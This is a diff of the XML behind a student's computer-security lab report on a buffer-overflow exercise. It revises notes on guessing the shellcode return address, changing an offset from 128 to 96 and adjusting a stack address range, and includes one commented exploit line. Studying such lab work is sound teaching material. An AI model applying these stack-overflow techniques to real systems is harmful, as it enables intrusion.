         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>roject 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="00B0F0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="ae"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:color w:val="00B0F0"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://github.com/EnzeXu/Computer_Security_Enze_Xu_Project2</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
@@ -184,7 +252,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -214,7 +282,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8">
+                    <a:blip r:embed="rId9">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -250,27 +318,17 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>2</w:t>
       </w:r>
       <w:r>
@@ -320,27 +378,17 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>2</w:t>
       </w:r>
       <w:r>
@@ -359,16 +407,6 @@
         </w:rPr>
         <w:t>Non-Executable Stack</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -558,7 +596,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9">
+                    <a:blip r:embed="rId10">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -968,7 +1006,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10">
+                    <a:blip r:embed="rId11">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1076,7 +1114,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11">
+                    <a:blip r:embed="rId12">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1141,7 +1179,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1380,136 +1418,6 @@
             <wp:extent cx="5274310" cy="711200"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
             <wp:docPr id="1" name="图片 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="711200"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>2.4 Task 2: Exploiting the Vulnerability</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>This t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>ask</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> took me quite a lot of time to try and modify</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> again and again. To begin with, I will give my final answer and then explain the wonderful process about how I get this.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B83A07E" wp14:editId="1C3AB244">
-            <wp:extent cx="4667341" cy="1052484"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="3" name="图片 3"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1529,6 +1437,136 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="711200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>2.4 Task 2: Exploiting the Vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>This t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ask</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> took me quite a lot of time to try and modify</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> again and again. To begin with, I will give my final answer and then explain the wonderful process about how I get this.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B83A07E" wp14:editId="1C3AB244">
+            <wp:extent cx="4667341" cy="1052484"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="图片 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="4686903" cy="1056895"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -4072,7 +4110,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15">
+                    <a:blip r:embed="rId16">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4178,7 +4216,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5100,7 +5138,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17">
+                    <a:blip r:embed="rId18">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5166,7 +5204,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18">
+                    <a:blip r:embed="rId19">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5266,7 +5304,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19">
+                    <a:blip r:embed="rId20">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5382,7 +5420,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5425,59 +5463,6 @@
             <wp:extent cx="4934639" cy="733527"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="14" name="图片 14"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4934639" cy="733527"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6359F137" wp14:editId="600FE637">
-            <wp:extent cx="5274310" cy="577215"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="15" name="图片 15"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5497,6 +5482,59 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="4934639" cy="733527"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6359F137" wp14:editId="600FE637">
+            <wp:extent cx="5274310" cy="577215"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="15" name="图片 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="5274310" cy="577215"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -5575,23 +5613,23 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>as the shellcode address, but I failed until I added 128 to it</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (I still don’t know why)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Then I realized there should be </w:t>
+        <w:t xml:space="preserve">as the shellcode address, but I failed until I added </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>96</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to it. Then I realized there should be </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
@@ -5700,7 +5738,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23">
+                    <a:blip r:embed="rId24">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5747,7 +5785,23 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>From the screenshot above, I know it should be no more than 0xbffff2c5, so the range is about from 0xbffff158 to 0xbffff2c5.</w:t>
+        <w:t>From the screenshot above, I know it should be no more than 0xbffff2c5, so the range is about from 0xbffff1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>8 to 0xbffff2c5.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5844,7 +5898,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24">
+                    <a:blip r:embed="rId25">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6339,7 +6393,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6538,7 +6592,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26">
+                    <a:blip r:embed="rId27">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6662,7 +6716,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId28"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6889,7 +6943,7 @@
           <w:sz w:val="13"/>
           <w:szCs w:val="13"/>
         </w:rPr>
-        <w:t xml:space="preserve">// or 0xbffff0d8 + 128; // 128 is a value can be decided by myself </w:t>
+        <w:t xml:space="preserve">// or 0xbffff0d8 + </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6899,6 +6953,46 @@
           <w:sz w:val="13"/>
           <w:szCs w:val="13"/>
         </w:rPr>
+        <w:t>96</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; // </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>96</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is a value can be decided by myself </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
